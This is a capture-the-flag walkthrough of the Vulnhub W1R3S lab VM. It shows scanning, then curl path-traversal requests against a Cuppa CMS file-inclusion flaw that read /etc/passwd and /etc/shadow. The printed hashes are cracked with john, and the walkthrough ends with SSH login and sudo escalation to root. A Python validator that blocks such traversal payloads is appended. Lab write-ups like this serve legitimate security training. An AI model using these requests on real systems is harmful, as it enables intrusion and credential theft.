SfTian

Vulnhub-w1r3s

# Penetration testing lab (low difficulty)

## Asset discovery

```shell
# Discover live hosts on the local subnet
netdiscover -r 192.168.0.0/24
# Scan all TCP ports on the target
nmap -p- 192.168.0.133
#masscan -p 0-65535 192.168.0.133
# Service and version detection with default scripts
nmap -sV -sC -p- -A 192.168.0.133
```

Results

```yaml
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
```

Of these, both FTP and MySQL allow unauthenticated access.

## FTP enumeration

Connecting to the FTP service with FileZilla retrieves flag2 from `content/key.txt`.

```
flag2{ZJSGABW@890}
```

## Website enumeration

### administrator directory

A dirb scan reveals a Cuppa CMS instance that is accessible without authentication.

![image-20240717084103970](https://download.imxbt.cn/upload/202407170841042023c79a503decf3404994fdcbd9d7d783d.png)

`administrator/media/files/` contains `file.csv`, which holds the admin's information.

![image-20240717084837424](https://download.imxbt.cn/upload/202407170848374794b8dd7005b1ff399344c330478601f4d.png)

Searching exploit-db for Cuppa CMS turns up exactly one entry whose date matches the `date_registered` value, a file inclusion vulnerability: [Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion](https://www.exploit-db.com/exploits/25971)

![image-20240717091032786](https://download.imxbt.cn/upload/20240717091032857a89e7f105c05d8cd9031f4b409ea8850.png)

Because HackBar returned no output, curl is used to read passwd instead.

![image-20240717091740946](https://download.imxbt.cn/upload/202407170917410563f6c2d09a8ad8548ed633edbf3763de8.png)

![image-20240717091810371](https://download.imxbt.cn/upload/20240717091810431071d05ac8369b8ba22525afb789e1a49.png)

```shell
curl --data-urlencode 'urlConfig=../../../../../../../../../etc/passwd' http://192.168.0.133/administrator/alerts/alertConfigField.php | grep bash
curl --data-urlencode 'urlConfig=../../../../../../../../../etc/shadow' http://192.168.0.133/administrator/alerts/alertConfigField.php
```

This yields flag3:

```
flag3{@789BWDJS}
```

Reading /etc/shadow gives the password hashes for root and w1r3s, which are then cracked with john.

| Username | Hash | Password |
| ------ | ------------------------------------------------------------ | ---- |
| root | \$6\$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0 | |
| w1r3s | \$6\$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP. | |

Copy the retrieved shadow entries to a local file and crack them with john.

```shell
# shadow file
#w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
#root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
john shadow --wordlist=/usr/share/john/password.lst
```

The crack recovers the password `computer` for `w1r3s`.

![image-20240717093307249](https://download.imxbt.cn/upload/2024071709330733496d5a96d6da8a8e576ebc07c8132b4f8.png)

### index_files directory

The `index_files` directory contains `flag.txt`, which gives flag1.

```
flag1{ZJSGABW@321}
```

### WordPress directory

Visiting it leads straight to the installation page.

![image-20240717085231855](https://download.imxbt.cn/upload/2024071708523193882a0c67017edaec162d81dec414bf2d7.png)

## Getshell

Log in over SSH with the w1r3s credentials obtained via the administrator directory; `key.txt` in the home directory gives flag4.

```
flag4{APKWT@AD}
```

Running `id` shows the account is in the sudo group, so `sudo /bin/bash` escalates directly to root, and flag5 is found in the root user's directory.

```
flag5{@GOODLUCK}
```

![image-20240717094315543](https://download.imxbt.cn/upload/20240717094315623c4bd043368e35e3235865ab526225c5e.png)
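
The traversal value sent in `urlConfig` in the administrator section succeeds only because the application includes whatever path it receives. As an added example (not code from the original post or from Cuppa CMS), this Python check shows server-side validation that rejects it; the allowed base directory and the `text_field.php` file name are assumptions.

```python
import os
from urllib.parse import parse_qs, unquote

# Hypothetical directory the application may include files from (an assumption).
ALLOWED_BASE = "/var/www/html/administrator/alerts/fields"


def check_url_config(form_body, base=ALLOWED_BASE):
    """Validate the urlConfig field of a form-encoded POST body.

    Returns (allowed, reason).
    """
    values = parse_qs(form_body, keep_blank_values=True).get("urlConfig", [])
    if len(values) != 1 or not values[0]:
        return False, "urlConfig missing, empty or repeated"
    value = values[0]  # parse_qs has already percent-decoded once

    # A second decodable layer (%252F) would hide ../ from the checks below.
    if unquote(value) != value:
        return False, "nested percent-encoding"
    if "\x00" in value:
        return False, "NUL byte in path"
    # Remote inclusion: refuse anything that looks like a URL or wrapper.
    if "://" in value or value.startswith("//"):
        return False, "remote or wrapper scheme"

    base_real = os.path.realpath(base)
    # join() drops base for absolute input, so /etc/shadow is caught below too.
    target = os.path.realpath(os.path.join(base_real, value))
    if target == base_real or os.path.commonpath([base_real, target]) != base_real:
        return False, "resolves outside allowed directory"
    return True, "ok"


# Constructed sample bodies; the first is the form body curl --data-urlencode
# produces for the traversal value shown in the walkthrough.
SAMPLES = [
    "urlConfig=" + "..%2F" * 9 + "etc%2Fpasswd",
    "urlConfig=..%252F..%252Fetc%252Fshadow",
    "urlConfig=http%3A%2F%2Fexample.invalid%2Fx.txt",
    "urlConfig=%2Fetc%2Fshadow",
    "urlConfig=text_field.php",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(check_url_config(body), body)
```

An allow-list of known include names is stricter still; the containment check is the minimum that stops `../` sequences and absolute paths.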